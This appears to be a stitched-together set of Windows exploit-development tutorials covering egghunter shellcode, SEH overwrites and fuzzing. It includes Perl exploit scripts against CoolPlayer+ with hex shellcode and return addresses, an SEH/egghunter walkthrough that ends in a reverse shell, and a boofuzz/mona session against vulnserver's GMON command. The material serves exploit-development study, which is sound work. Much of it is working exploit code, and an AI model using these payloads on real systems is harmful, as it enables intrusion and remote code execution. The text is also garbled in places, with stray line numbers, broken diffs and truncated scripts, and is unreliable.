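hunter = bytes.fromhex(
    "6681caff0f"   # or dx, 0x0fff
    "42"           # inc edx
    "52"           # push edx
    "6a43"         # push 0x43
    "58"           # pop eax
    "cd2e"         # int 0x2e
    "3c05"         # cmp al, 0x05
    "5a"           # pop edx
    "74ef"         # jz  loop_inc_page
    "b850574e44"   # mov eax, 0x444e5750
    "8bfa"         # mov edi, edx
    "af"           # scasd
    "75ea"         # jnz loop_inc_one
    "af"           # scasd
    "75e7"         # jnz loop_inc_one
    "ffe7"         # jmp edi
)

def rel8_target(code, offset):
    """Offset reached by the 2-byte short jump located at 'offset'."""
    disp = int.from_bytes(code[offset + 1:offset + 2], "little", signed=True)
    return offset + 2 + disp

print(len(hunter))
for jump_offset in (15, 25, 28):
    print(jump_offset, "->", rel8_target(hunter, jump_offset))
```

Offset 0 is the or instruction (loop_inc_page) and offset 5 is the inc (loop_inc_one), which matches the labels in the assembly listing.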
For the purposes of this demo, I’ll break up the hex with comments so you can easily match it
to the corresponding Assembly instruction. Here it is incorporated into the exploit script we
wrote in Part 4:
#!/usr/bin/perl
###########################################################################################
# Exploit Title: CoolPlayer+ Portable v2.19.4 - Local Buffer Overflow Shellcode Jump Demo
# Date: 12-24-2013
# Author: Mike Czumak (T_v3rn1x) -- @SecuritySift
# Vulnerable Software: CoolPlayer+ Portable v2.19.4
# Software Link: http://portableapps.com/apps/music_video/coolplayerp_portable
# Tested On: Windows XP SP3
# Based on original POC exploit: http://www.exploit-db.com/exploits/4839/
# Details: Egghunter Demo
###########################################################################################
my $junk = "\x90" x 260; # nops to slide into $jmp; offset to eip overwrite at 260
my $eip = pack('V',0x7c86467b); # jmp esp [kernel32.dll]
my $egghunter = "\x66\x81\xCA\xFF\x0F"; # or dx,0x0fff
$egghunter = $egghunter . "\x42"; # inc edx
$egghunter = $egghunter . "\x52"; # push edx (save current address on the stack)
$egghunter = $egghunter . "\x6A\x43"; # push byte +0x43
$egghunter = $egghunter . "\x58"; # pop eax
$egghunter = $egghunter . "\xCD\x2E"; # int 0x2e
$egghunter = $egghunter . "\x3C\x05"; # cmp al,0x5
$egghunter = $egghunter . "\x5A"; # pop edx
$egghunter = $egghunter . "\x74\xEF"; # jz 0x0
$egghunter = $egghunter . "\xB8\x50\x57\x4e\x44"; # mov eax,PWND
$egghunter = $egghunter . "\x8B\xFA"; # mov edi,edx
$egghunter = $egghunter . "\xAF"; # scasd
$egghunter = $egghunter . "\x75\xEA"; # jnz 0x5
$egghunter = $egghunter . "\xAF"; # scasd
$egghunter = $egghunter . "\x75\xE7"; # jnz 0x5
$egghunter = $egghunter . "\xFF\xE7"; # jmp edi
Also note I added the $egg and incorporated both it and the Egghunter into the $sploit portion
of the buffer. Try the resulting .m3u file in CoolPlayer+ and you should get …
If you look closely, you’ll note that although we see the start of our shellcode (prefaced by
“PWNDPWND”) the shellcode is not intact, which is what caused our exploit to crash. This
corrupted version of our shellcode is the first to appear in memory and the Egghunter is not
smart enough to know the difference — it’s only designed to execute the instructions after the
first “PWNDPWND” it finds. An Egghunter exploit might still be possible, provided our
shellcode resides intact somewhere in memory.
The first two entries marked as “[Stack]” both appear in the previous screenshot and both are
corrupted versions of our shellcode. That leaves the third entry from the Heap. Double-click
that entry to view it in memory.
Perfect, it’s intact. But how do we get our otherwise “dumb” Egghunter to skip the first two
corrupted entries in memory and execute the third? We have a few choices.
If we have a scenario that calls for the use of an Egghunter but successful exploit is being
hindered by the presence of multiple, corrupted copies of our shellcode we could:
• Add some additional error checking to our Egghunter (“Egg Sandwich” Egghunter)
One of the simplest methods of addressing this problem is to “push” the shellcode further into
memory so the early copies are never made and (hopefully) the first copy the Egghunter
reaches is intact.
Let’s try it with our CoolPlayer exploit. Add a new variable $offset and insert it into the buffer
as follows:
This time the offset pushed the shellcode far enough into our buffer so that no corrupted
copies were placed on the stack and only the intact copy from the heap remains.
If we can predict where the corrupted copies are going to reside, we can simply tell the
Egghunter to start looking after those memory addresses. This could probably be done any
number of ways, but for this demo I’ll use an existing register and the ADD instruction.
From the previous mona search, we know both corrupted copies reside
at 0x0012F1AC and 0x0012F31C, so all we need to do is start our Egghunter after these
addresses. To do so, we need to change the value of EDX before the first memory page is
loaded.
Launch the exploit as-is and pause execution at the very beginning of the Egghunter
routine to examine the stack. Specifically, look at ESP:
We need to start beyond 0x0012F31C. Subtract ESP from that and you get 0x190, or 400
decimal. Therefore we can load EDX with ESP and then add at least 400 to EDX to push the starting
memory page beyond the corrupted shellcode. An updated version of the Egghunter is below.
Note I had to break up the ADD EDX instruction to avoid NULLs.
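The arithmetic here is easy to verify in Python. In this sketch the ESP value is not taken from the screenshot; it is inferred from the stated difference of 0x190, so treat it as an assumption. The last lines illustrate why a single ADD with a 32-bit immediate is a problem: the encoded immediate contains NULL bytes.

```python
import struct

last_corrupt_copy = 0x0012F31C       # address given in the text
distance = 0x190                     # stated difference, 400 decimal
esp = last_corrupt_copy - distance   # inferred ESP (assumption, not from the source)

# A 32-bit immediate of 400 is stored little-endian and padded with zero bytes.
imm32 = struct.pack("<I", distance)
has_null = b"\x00" in imm32

print(hex(esp), distance, imm32.hex(), has_null)
```

Any replacement sequence has to reach the same total using operands whose encodings contain no zero bytes, which is what breaking up the ADD achieves.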
Here is EDX (and our new starting memory page) after executing the new mov/add
instructions:
We’ve successfully pushed past the corrupted shellcode. Continue execution and …
Since one of the key features of a useful Egghunter is to be as small as possible, these extra 14
bytes of instructions can be seen as a negative, but if you have the space, it’s a viable option.
Alternatively, you may consider trying to come up with more efficient methods of loading EDX
with a larger address.
The idea behind the Omelette Egghunter is to break up your shellcode into multiple chunks,
each prefaced with its own egg as well as an additional tag that contains two pieces of
information: 1) an indicator as to whether it is the last chunk of shellcode and 2) the length of
the shellcode chunk.
This approach can be useful if you know your shellcode gets corrupted when kept in large
chunks but can stay intact if it’s divided into small enough pieces. At a high level it works like
this:
$shellcode = "\x41\x41\x41\x41\x42\x42\x42\x42\x43\x43\x43\x43";
Left as-is, there is not enough space in memory to house it in its entirety, so we want to break
it up into three chunks. We’ll use the same egg (PWNDPWND). We also need to append a
two-byte tag to this egg. The first byte is the chunk identifier: you can use any identifier, but the
last chunk must be different from the preceding chunks so the Egghunter knows when it has
reached the end of the shellcode. You could use \x01 for the last chunk and \x02 for all
preceding chunks. The second byte is the size of the shellcode chunk. In this rudimentary
example, all three chunks will be 4 bytes in length so the second byte of the tag will be \x04.
Note that since the size is stored as a single byte, each chunk is limited to 255 bytes in size.
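The tagging scheme can be sketched in a few lines of Python. The function name make_chunks and its parameters are made up for this illustration; the marker values (\x02 for preceding chunks, \x01 for the last) follow the suggestion in the text.

```python
def make_chunks(shellcode, chunk_size, egg=b"PWNDPWND"):
    """Split shellcode into pieces, each prefixed with egg + marker + size."""
    if not 0 < chunk_size <= 255:
        raise ValueError("the size tag is a single byte")
    pieces = [shellcode[i:i + chunk_size]
              for i in range(0, len(shellcode), chunk_size)]
    chunks = []
    for index, piece in enumerate(pieces):
        is_last = index == len(pieces) - 1
        marker = b"\x01" if is_last else b"\x02"
        chunks.append(egg + marker + bytes([len(piece)]) + piece)
    return chunks

for chunk in make_chunks(b"AAAABBBBCCCC", 4):
    print("".join("\\x%02x" % byte for byte in chunk))
```

For the 12-byte example, the three tagged chunks are: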
"\x50\x57\x4e\x44\x50\x57\x4e\x44\x02\x04\x41\x41\x41\x41"
"\x50\x57\x4e\x44\x50\x57\x4e\x44\x02\x04\x42\x42\x42\x42"
"\x50\x57\x4e\x44\x50\x57\x4e\x44\x01\x04\x43\x43\x43\x43"
The Omelette Egghunter code locates each of the chunks and writes them, in order, to the
stack to reassemble and execute the shellcode. I’m not going to explain the Omelette Egghunter
code but I encourage you to take a look at an example
here: http://www.thegreycorner.com/2013/10/omlette-egghunter-shellcode.html.
It’s a very useful concept but does have some flaws. First, the shellcode chunks must be placed
into memory in order, something you might not have control over. Second, the reassembled
shellcode is written to ESP and you risk writing over something important, including the
Egghunter itself. (I’ve experienced both of these problems). Third, to take advantage of this
added functionality, you sacrifice size — the omelette example found at the above link is 53
bytes vs. 32 bytes for the NtDisplayString Egghunter. Also, similar to
the NtDisplayString Egghunter, it will grab the first egg-prepended shellcode it reaches in
memory without means to verify whether it is a corrupted copy.
Despite these potential shortcomings, the Omelette Egghunter might be right for certain
situations so keep it in mind.
When I was considering various solutions for broken shellcode I thought it should be possible
to have the Egghunter validate the integrity of the shellcode before executing to ensure it had
found an intact version. That way, there would be no need to worry how many corrupt
versions of the shellcode might reside in memory and no reason to worry about changing
offsets or memory pages. Also, in exploits such as the one for CoolPlayer, since an intact copy
does reside somewhere in memory, there would be no need to break the shellcode up into
smaller chunks (as in the Omelette example).
The prepended egg also contains a two byte tag similar to the Omelette Egghunter — the first
byte identifies the egg number (\x01) and the second byte is the offset to the second egg
(equal to the length of the shellcode). The second appended egg would also contain a two byte
tag — the first byte is the egg number (\x02) and the second byte is the offset to the beginning
of the shellcode (equal to the length of shellcode + length of the second egg).
Assuming we use our 227 byte calc.exe shellcode and our egg of PWNDPWND, the first and
second eggs in the Egg Sandwich would look as follows:
\x50\x57\x4e\x44\x50\x57\x4e\x44\x01\xe3
\x50\x57\x4e\x44\x50\x57\x4e\x44\x02\xeb
Note the first egg’s size tag is \xe3 (or 227, the length of the shellcode) while the second
is \xeb (shellcode + 8 = 235).
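The two tags can be derived mechanically from the shellcode length. Here is a minimal Python sketch; the function name sandwich is made up, and the 227 bytes are a placeholder standing in for the calc.exe shellcode, which is not reproduced here.

```python
def sandwich(shellcode, egg=b"PWNDPWND"):
    """Wrap shellcode between a prepended egg (#1) and an appended egg (#2)."""
    length = len(shellcode)
    if length + len(egg) > 255:
        raise ValueError("both offsets must fit in a single byte")
    first = egg + b"\x01" + bytes([length])               # offset to the second egg
    second = egg + b"\x02" + bytes([length + len(egg)])   # offset back to the shellcode
    return first + shellcode + second

placeholder = b"\x90" * 227      # stands in for the 227-byte shellcode (assumption)
wrapped = sandwich(placeholder)
print(wrapped[:10].hex(), wrapped[-10:].hex())
```

Because each offset is a single byte, this layout as described only works for shellcode of up to 247 bytes.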
The Egghunter code locates the first egg as normal. It then reads the egg number tag to verify
it has found the first egg and uses the offset tag to jump the appropriate number of bytes to
the second egg. It then checks to make sure the second found egg is in fact the appended egg
(by verifying its number) and then uses the offset tag to jump back to the beginning of the
shellcode to execute.
Any corrupted copies of the shellcode that have had bytes added or subtracted in any way will
fail the second egg check and be skipped. The only way a corrupted egg would pass this
verification step would be if it maintained the exact same number of bytes as the original.
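The integrity check can be simulated in Python on a bytes object. This is a simplified model with a made-up function name: it locates a first egg, uses its offset byte to look for the second egg where it should be, and moves on if the check fails. It does not model the jump back through the second offset tag.

```python
EGG = b"PWNDPWND"

def find_intact(memory):
    """Return the offset of the first shellcode copy that passes the second-egg check."""
    pos = memory.find(EGG + b"\x01")
    while pos != -1:
        body = pos + len(EGG) + 2                 # shellcode starts after egg + 2-byte tag
        if body <= len(memory):
            length = memory[body - 1]             # offset tag of the first egg
            tail = body + length                  # where the second egg should begin
            if memory[tail:tail + len(EGG) + 1] == EGG + b"\x02":
                return body
        pos = memory.find(EGG + b"\x01", pos + 1)
    return None

good = EGG + b"\x01\x04" + b"ABCD" + EGG + b"\x02\x0c"
corrupt = EGG + b"\x01\x04" + b"AB"               # truncated copy
memory = corrupt + b"\x00" * 8 + good
start = find_intact(memory)
print(start, memory[start:start + 4])
```

The truncated copy appears first in memory but is skipped, since the bytes at its expected second-egg position do not match.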
Here is the Perl exploit script for CoolPlayer+ modified with the Egg Sandwich Egghunter code:
#!/usr/bin/perl
###########################################################################################
# Exploit Title: CoolPlayer+ Portable v2.19.4 - Local Buffer Overflow Shellcode Jump Demo
# Date: 12-24-2013
# Author: Mike Czumak (T_v3rn1x) -- @SecuritySift
# Vulnerable Software: CoolPlayer+ Portable v2.19.4
# Software Link: http://portableapps.com/apps/music_video/coolplayerp_portable
# Tested On: Windows XP SP3
# Based on original POC exploit: http://www.exploit-db.com/exploits/4839/
# Details: Egg Sandwich Egghunter Demo
###########################################################################################
my $junk = "\x90" x 260; # nops to slide into $jmp; offset to eip overwrite at 260
my $eip = pack('V',0x7c86467b); # jmp esp [kernel32.dll]
# loop_inc_page:
my $egghunter = "\x66\x81\xca\xff\x0f"; # OR DX,0FFF ; get next page
# loop_inc_one:
$egghunter = $egghunter . "\x42"; # INC EDX ; increment EDX by 1 to get next memory address
# check_memory:
$egghunter = $egghunter . "\x52"; # PUSH EDX ; save current address to stack
$egghunter = $egghunter . "\x6a\x43"; # PUSH 43 ; push Syscall for NtDisplayString to stack
$egghunter = $egghunter . "\x58"; # POP EAX ; pop syscall parameter into EAX for syscall
$egghunter = $egghunter . "\xcd\x2e"; # INT 2E ; issue interrupt to make syscall
$egghunter = $egghunter . "\x3c\x05"; # CMP AL,5 ; compare low order byte of eax to 0x5
(indicates access violation)
$egghunter = $egghunter . "\x5a"; # POP EDX ; restore EDX from the stack
$egghunter = $egghunter . "\x74\xef"; # JE SHORT ;if zf flag = 1, access violation, jump to
loop_inc_page
# check_egg
$egghunter = $egghunter . "\xb8\x50\x57\x4e\x44"; # MOV EAX,444E5750 ; valid address,
move egg value (PWND) into EAX for comparison
$egghunter = $egghunter . "\x8b\xfa"; # MOV EDI,EDX ; set edi to current address pointer for
use in scasd
$egghunter = $egghunter . "\xaf"; # SCASD ; compare value in EAX to dword value addressed
by EDI
# ; increment EDI by 4 if DF flag is 0 or decrement if 1
$egghunter = $egghunter . "\x75\xea"; # JNZ SHORT ; egg not found, jump back to
loop_inc_one
$egghunter = $egghunter . "\xaf"; # SCASD ; first half of egg found, compare next half
$egghunter = $egghunter . "\x75\xe7"; # JNZ SHORT ; only first half found, jump back to
loop_inc_one
# found_egg
$egghunter = $egghunter . "\x8b\xf7"; # MOV ESI,EDI ; first egg found, move start address of
shellcode to ESI for LODSB
$egghunter = $egghunter . "\x31\xc0"; # XOR EAX, EAX ; clear EAX contents
$egghunter = $egghunter . "\xac"; # LODSB ; loads egg number (1 or 2) into AL
$egghunter = $egghunter . "\x8b\xd7"; # MOV EDX,EDI ; move start of shellcode into EDX
$egghunter = $egghunter . "\x3c\x01"; # CMP AL,1 ; determine if this is the first egg or last egg
$egghunter = $egghunter . "\xac"; # LODSB ; loads size of shellcode from $egg1 into AL
$egghunter = $egghunter . "\x75\x04"; # JNZ SHORT ; cmp false, second egg found, goto
second_egg
# first_egg
$egghunter = $egghunter . "\x01\xc2"; # ADD EDX, EAX ; increment EDX by size of shellcode to
point to 2nd egg
$egghunter = $egghunter . "\x75\xe3"; # JNZ SHORT ; jump back to check_egg
# second_egg
$egghunter = $egghunter . "\x29\xc7"; # SUB EDI, EAX ; decrement EDX to point to start of
shellcode
$egghunter = $egghunter . "\xff\xe7"; # JMP EDI ; execute shellcode
my $nops = "\x90" x 50;
my $egg1 = "\x50\x57\x4e\x44\x50\x57\x4e\x44\x01\xe3"; # egg = PWNDPWND; id = 1; offset
to egg2 = 227
https://www.securitysift.com/download/egg_sandwich.c
I wouldn’t be surprised if I weren’t the first to think of this “Egg Sandwich” approach, though I
couldn’t find any other references. It does have some disadvantages:
• In its current state it accommodates a single byte for the offset size tag, meaning the
shellcode is limited to 255 bytes or smaller (247 in practice, because the second egg’s tag
stores the shellcode length plus 8). That could be adjusted, though it will likely increase the
size of the Egghunter code.
Anyway, at the very least it may get you thinking of other ways to implement Egghunters or
maybe even improve upon this one.
https://www.securitysift.com/windows-exploit-development-part-5-locating-shellcode-egghunting/
The first step is to find the parameters in the web app vulnerable to a buffer overflow. So let's
send an HTTP request to the webserver with a payload of 4200 bytes in the GET request. You
can opt for a bigger payload if the program does not crash.
We are using the above Python script to send our payload to the server.
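A minimal sketch of such a sender is shown here. The target address, the port, and the choice to place the 4200 bytes in the request path are assumptions for illustration; the original script is not reproduced in these notes.

```python
import socket

TARGET = ("192.168.0.10", 80)  # hypothetical lab address and port


def build_request(size: int = 4200, host: str = TARGET[0]) -> bytes:
    """Build a GET request whose path is `size` bytes of 'A' (assumed injection point)."""
    payload = b"A" * size
    return b"GET " + payload + b" HTTP/1.0\r\nHost: " + host.encode() + b"\r\n\r\n"


def send_request(request: bytes, target=TARGET, timeout: float = 5.0) -> None:
    """Open a TCP connection to the lab target and send the raw request."""
    with socket.create_connection(target, timeout=timeout) as sock:
        sock.sendall(request)


if __name__ == "__main__":
    send_request(build_request())
```

If the server survives, build_request can be called with a larger size, as the text suggests.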
Let's also have a look at the immunity debugger as we send the payload.
Here we see our first access violation. In the EDI register, we can see that there is a SQL table
in the background and the instruction is making a query to the database. The file name can be
as long as we want. Let’s see how we can exploit this to get remote code execution on the
webserver.
From the above image, we can see that the webserver crashed and the EIP (Instruction
Pointer) is overwritten with the As from our payload (\x41=A).
Let's also have a look at the rest of the overwritten buffer. If the rest of the buffer is loaded
intact into the memory we can overwrite EIP with an instruction to redirect the execution flow
to the memory section where our shellcode resides. Before we move to shellcode - we should
check for bad characters. For this, we will follow the same process of loading all possible hex
characters into our payload and execute it. Then we will check the memory for missing
characters or broken sequences and then take care to avoid such characters in our shellcode to
be executed.
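The "all possible hex characters" test buffer can be produced with a short helper. This is a sketch; the name candidate_bytes is made up here, and excluding the null byte up front is an assumption based on common practice rather than something the text states.

```python
def candidate_bytes(exclude: bytes = b"\x00") -> bytes:
    """Return every byte value from 0x00 to 0xff except those in `exclude`."""
    return bytes(b for b in range(256) if b not in exclude)


if __name__ == "__main__":
    test_buffer = candidate_bytes()
    print(len(test_buffer), test_buffer[:8].hex())
```

Each time a byte turns out to break the sequence in memory, add it to `exclude` and send the buffer again until the whole array arrives intact.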
Now let's have a look at the buffer we overwrote in the step above.
Here we can see that our payload is overwriting the Structured Exception Handler.
SEH
SEH can be described as a chain of handler functions that each try to handle a raised
exception. The system passes the exception to one handler after another until it is handled or
no handler is left, in which case the program crashes.
Finding Offset
Here we want the program to handle this exception. From the image above we can see that
we have overwritten the SE handler and also the pointer to the next SE handler. To control the
SE handler we need to find the exact offset that is overwritten by the payload in the buffer on
the SE handler.
To do that we can create a unique pattern of strings using the Metasploit module and then
query the contents of the SE handler to the same module to find the location of exact
overwrite.
After doing the same we find the offset to be at 4065 bytes as shown in the image.
To exploit a buffer overflow in this situation we will use the pop-pop-ret technique. The
overwritten SE handler must point to a pop-pop-ret instruction sequence. When the exception
is dispatched, the two pops remove the top two values from the stack and the ret transfers
execution to the next value, which is the address of the pointer to the next SEH record (nSEH),
located just before the SE handler.
Whatever we write into nSEH will therefore be executed as instructions, so we put a short
jump there that skips over the SE handler and starts executing the shellcode we inject in the
buffer.
We can start our shellcode 6 - 10 bytes past the SE handler and have the short jump in nSEH
land on it.
So now let's find the location of nSEH using mona pattern_offset.
The SE handler is overwritten at offset 4065, so nSEH, which sits 4 bytes before it, is at offset
4061.
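The resulting buffer layout can be sketched as follows. The offset 4061 comes from the text; the pop-pop-ret address is a placeholder, and the 16-byte nop pad and the helper name build_seh_payload are assumptions.

```python
import struct

NSEH_OFFSET = 4061              # offset of nSEH from the text; SE handler follows at 4065
POP_POP_RET = 0x10101010        # hypothetical placeholder, replace with an address from seh.txt
SHORT_JMP = b"\xeb\x06\x90\x90"  # jmp short +6, padded to 4 bytes with two nops


def build_seh_payload(shellcode: bytes = b"", ppr: int = POP_POP_RET) -> bytes:
    """Lay out junk + nSEH + SE handler + nops + shellcode."""
    payload = b"A" * NSEH_OFFSET
    payload += SHORT_JMP                 # nSEH: hop over the 4-byte handler address
    payload += struct.pack("<I", ppr)    # SE handler: little-endian pop-pop-ret address
    payload += b"\x90" * 16              # small landing pad (assumed size)
    payload += shellcode
    return payload


if __name__ == "__main__":
    p = build_seh_payload(b"\xcc")
    print(len(p), p[4061:4069].hex())
```

The jump displacement of 6 is counted from the end of the 2-byte jmp instruction, so execution lands on the first byte after the handler address.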
Let’s now list the modules loaded with the application so that we can reuse a pop - pop - ret
sequence already present in one of them by writing its address into the SE handler.
Then open the seh.txt file in the Windows OS. Here we will search for instruction -
Then copy the address of that instruction sequence and use it as the value that overwrites the
SE handler.
Before copying this address, make sure that ASLR and SafeSEH are both reported as False for
the module and that the instruction does not come from an OS library.
Let's set up a breakpoint on the above address in Immunity Debugger to see the execution in
action.
Once the RETN instruction has executed we will reach our JMP SHORT instruction.
Now it’s time to replace our nops with a working payload to get code execution for the shell.
After injecting my shellcode in this nop area and trying to get it executed, for some reason
only the first few bytes would execute and the payload would then fail.
Egg Hunter
Here we can use an ‘Egg Hunter’ payload. The egg hunter is a small set of instructions
assembled to opcodes, and in that respect it is no different from any other shellcode. Its
purpose is to search the process’s memory for our final-stage shellcode and redirect execution
flow to it.
To do that we need another parameter where we can inject the final-stage payload: the
User-Agent header. The egg hunter looks for a 4-byte tag (the egg); if we generate the hunter
with mona, the default tag is “w00t”.
We will put this tag in front of our payload so that the hunter knows the shellcode to be
executed lies directly after it and can pass execution to it. We will write the tag twice so that
the egg hunter does not find itself in memory (the hunter contains w00t once; the egg is w00t
twice).
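The reason for doubling the tag can be shown with a small simulation over a byte string standing in for process memory. This is a sketch of the idea only; the hunt function and the stub bytes are illustrative assumptions, not mona's egghunter.

```python
TAG = b"w00t"


def hunt(memory: bytes, tag: bytes = TAG):
    """Return the index of the first byte after tag+tag, or None if not found."""
    doubled = tag + tag
    idx = memory.find(doubled)
    return None if idx == -1 else idx + len(doubled)


if __name__ == "__main__":
    # The hunter itself embeds the tag once (as the operand of a MOV EAX).
    hunter_stub = b"\xb8" + TAG + b"\x8b\xfa\xaf"
    memory = hunter_stub + b"\x00" * 32 + TAG * 2 + b"\xcc\xcc"
    print(hunt(hunter_stub), hunt(memory))
```

The single copy inside the hunter never matches, while the doubled tag in front of the second-stage payload does.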
Let’s use the egg hunter from the file provided with mona.
For payload 2 we will just create a TCP reverse shellcode that will give us code execution and
inject it in the ‘ User-Agent ’. Link to the code for reference is provided in the references. Let’s
now see this in action again.
Exploit
Here the egg hunter scans memory repeatedly for two consecutive occurrences of the string
w00t. Now let’s set a breakpoint at SCAS DWORD PTR ES:[EDI] as shown below to pause
execution once it finds an occurrence of the ‘w00t’ string.
We see that the hunter seems to have found itself or a random single occurrence of the string
in memory, but it will keep scanning until it finds the string twice in a row. Now set the
breakpoint at JMP EDI - as EDI will be the location of our payload - and let the execution
continue.
Here we see that the egg hunter has found our egg and the payload that follows it.
Now set up a handler on the attacking machine to receive the shell once our payload executes
and let the execution continue.
Here we can see that the execution has jumped to our payload and we have a shell on our
target system.
References :
https://www.corelan.be/index.php/2010/01/09/exploit-writing-tutorial-part-8-win32-egg-hunting/
https://www.fuzzysecurity.com/tutorials/expDev/4.html
https://github.com/haxxorrR/security/blob/master/EasyFileSharingBufferOverflow/Overflow.py
https://techjoomla.com/blog/beyond-joomla/seh-buffer-overflow-exploitation-using-egghunter-payload
https://www.youtube.com/watch?v=JEPNdhyOxo0
LAB ENVIRONMENT
• Architecture: x86
• Debugger: WinDbg
• Fuzzer: boofuzz
o mona.py
In case you’re missing anything listed above (excluding vulnserver), check out OSCE Exam
Practice - Part I (Lab Setup).
DISCLAIMER: This series of posts is geared toward diving deeper on more modern tooling
(boofuzz, windbg, mona, et al) as well as gaining proficiency/efficiency with exploit
development. It’s not a guide for the how-to portion of writing a PoC (even though I step
through things slowly, I don’t explain things to that level of detail). I assume if you’re here to
look at OSCE practice examples, you probably don’t need the step-by-step instructions for
every little thing. With all that said, I hope you find something useful!
• Lab Setup
INTRODUCTION
Welcome back! In this post we’ll develop an exploit for vulnserver’s GMON command using an
SEH overwrite and an egg hunter. Based off of the work done in Part II, we have a lot of ready
made templates located in the companion repository. These templates will speed up exploit
dev considerably. Additionally, we won’t be spending as much time on things already covered
in Part II. If something comes completely out of left field and you want me to expand upon it,
just drop me a line!
FUZZING
BOOFUZZ SCRIPT
We’ll begin by fuzzing the GMON command. GMON handles input similarly to how TRUN did in
the last post. Due to our awesome foresight, we can make a small modification to
the fuzzer.py found in the repo and be off to the races.
Start out by cloning the repository (or on windows downloading the zip). Once that’s done,
copy the TEMPLATE_DIR directory and name the copy GMON. We should have a new folder
with the below structure.
├── GMON
│ ├── final-poc
│ │ └── exploit.py
│ ├── find-offset
│ │ └── exploit.py
│ ├── fuzzing
│ │ └── fuzzer.py
│ ├── id-bad-chars
│ │ └── exploit.py
│ └── initial-crash
│ └── exploit.py
To the following
55s_string("GMON", fuzzable=False)
FUZZING DETOUR
One thing of note, I made a second modification to boofuzz during this fuzzing session. I kept
getting socket.error: [Errno 10054] An existing connection was forcibly closed by the remote
host on the process_monitor.py side of things. After googling around, I found this boofuzz
issue which talks about the same problem but not specifically about process_monitor.py.
After digging around using the traceback to guide me, I made the following change
to boofuzz\monitors\pedrpc.py
3--- a/boofuzz/monitors/pedrpc.py
4+++ b/boofuzz/monitors/pedrpc.py
6 try:
7 self.__client_sock.shutdown(socket.SHUT_RDWR)
8 except socket.error as e:
9- if e.errno == errno.ENOTCONN:
11 pass
12 else:
13 raise
14
All this does is prevent the exception from being raised when process_monitor.py encounters
this particular socket error. After making this change, all fuzzing sessions have run to completion.
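The idea behind the change can be sketched as a standalone function. This is not the boofuzz patch itself (the added line is missing from the diff above); it assumes that Winsock error 10054 is surfaced by Python as errno.ECONNRESET, and the name quiet_shutdown is made up for illustration.

```python
import errno
import socket

# Errors treated as "the peer is already gone"; ECONNRESET is assumed to be
# how Python reports Winsock error 10054 on Windows.
IGNORED_ERRNOS = {errno.ENOTCONN, errno.ECONNRESET}


def quiet_shutdown(sock: socket.socket) -> None:
    """Shut a socket down, ignoring 'not connected' and 'connection reset'."""
    try:
        sock.shutdown(socket.SHUT_RDWR)
    except socket.error as e:
        if e.errno in IGNORED_ERRNOS:
            pass
        else:
            raise


if __name__ == "__main__":
    s = socket.socket()
    quiet_shutdown(s)  # never connected: the resulting error is swallowed
    s.close()
```

Any other socket error still propagates, so unrelated failures are not hidden.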
DISCLAIMER: Making this change may have unintended consequences. So far I’ve successfully
fuzzed GMON and KSTET with this change in place, but who knows…
Follow Up: Twitter user @Ramon_JCFK told me they were still getting 10054 errors even after
making the two suggested changes to boofuzz. We ensured that he had the changes in place
correctly but still came up short. He let me know later that running process_monitor.py on
windows and then the fuzzer from kali worked. So, that’s another option available if fuzzing
from windows isn’t working out.
Terminal 1:
C:\Python27\python.exe C:\Users\vagrant\Downloads\boofuzz-master\process_monitor.py
═══════════════════════════════════════════
[06:23.08] # records: 0
Terminal 2:
C:\Python37\python.exe .\fuzzer.py
══════════════════════════════════
...
CRASHES
Our fuzzing yields two crashes. We can see the relevant context dumps below, showing we’re
able to overwrite EIP.
CONTEXT DUMP
EIP: 41414141 Unable to disassemble at 41414141
CONTEXT DUMP
Fortunately, there is only one boofuzz test case sent that uses capital A’s (it’s also the same
fuzz string used in the TRUN PoC). If you need a refresher on going from the crashes to the
payload sent and its length, check out the boofuzz-results Database section of Part II.
Similar to our fuzzer, we just need to change the following lines in our template.
5CRASH_LEN = 0 # change me
To the following
Well, we have the crash, but EIP doesn’t hold 41414141. We can check to see if our fuzz
string made it into the SEH chain.
WINDBG !EXCHAIN
Windbg’s !exchain extension displays the list of exception handlers for the current thread. The
list begins with the first handler on the chain (the one that is given the first opportunity to
handle an exception) and continues on to the end.
!exchain
════════
018effc4: 41414141
To determine the offset, we’ll use mona to create a cyclic pattern and update our next
template.
This time, we’ll update GMON\find-offset\exploit.py (notice the directory) and change lines 4-
11 from
5CRASH_LEN = 0 # change me
6OFFSET = 0 # change me
10payload = VULNSRVR_CMD
to
6OFFSET = 0 # change me
10payload = VULNSRVR_CMD
11payload += b"Aa0Aa1Aa2Aa3Aa4A..."
With that done, we’ll hook up windbg again and send the find-offset PoC. Once execution
stops, we can run findmsp to determine the offset.
════════════════
Hold on...
- Stack pivot between 34 & 3606 bytes needed to land in this pattern
SEH record (nseh field) at 0x01acffc4 overwritten with normal pattern : 0x6e45316e (offset
3514), followed by 52 bytes of cyclic data after the handler
0x01acf20c : Contains normal cyclic pattern at ESP+0x24 (+36) : offset 2, length 3572 (->
0x01acffff : ESP+0xe18)
[+] Examining stack (entire stack) - looking for pointers to cyclic pattern
0x01acf164 : Pointer into normal cyclic pattern at ESP-0x84 (-132) : 0x01acfc60 : offset
2646, length 928
0x01acf168 : Pointer into normal cyclic pattern at ESP-0x80 (-128) : 0x01acf7a0 : offset
1430, length 2144
- Folder created
- (Re)setting logfile c:\monalogs\vulnserver_2684\findmsp.txt
- Processing modules
There we go, the offset to the nSEH field is 3514! There’s an important piece of information on
that same line: there are only 52 bytes of cyclic data after the handler. That limits what
shellcode we can insert after the handler. We’ll come back to this a little later.
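The offset mona reports can be reproduced by hand. The sketch below regenerates the familiar Aa0Aa1Aa2... pattern and looks up the value from the findmsp output; it is an independent reimplementation for illustration, not mona's code, and the function names are assumptions.

```python
import struct
from itertools import product
from string import ascii_lowercase, ascii_uppercase, digits


def cyclic_pattern(length: int) -> bytes:
    """Generate the Aa0Aa1Aa2... pattern (uppercase, lowercase, digit triples)."""
    out = bytearray()
    for upper, lower, digit in product(ascii_uppercase, ascii_lowercase, digits):
        if len(out) >= length:
            break
        out += (upper + lower + digit).encode()
    return bytes(out[:length])


def pattern_offset(value: int, length: int = 5000) -> int:
    """Find where a 32-bit register value (little-endian in memory) sits in the pattern."""
    needle = struct.pack("<I", value)
    return cyclic_pattern(length).find(needle)


if __name__ == "__main__":
    print(pattern_offset(0x6E45316E))
```

The value 0x6e45316e is the bytes "n1En" in memory order, which is why the lookup packs the integer as little-endian before searching.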
Now that we know the offset, let’s update our PoC and confirm it.
Our updated script will look like what’s below. We update the OFFSET variable with 3514.
Additionally, we comment out the cyclic pattern. Finally, we un-comment lines 14-16.
1import struct
2import socket
6OFFSET = 3514
10payload = VULNSRVR_CMD
12
17
20
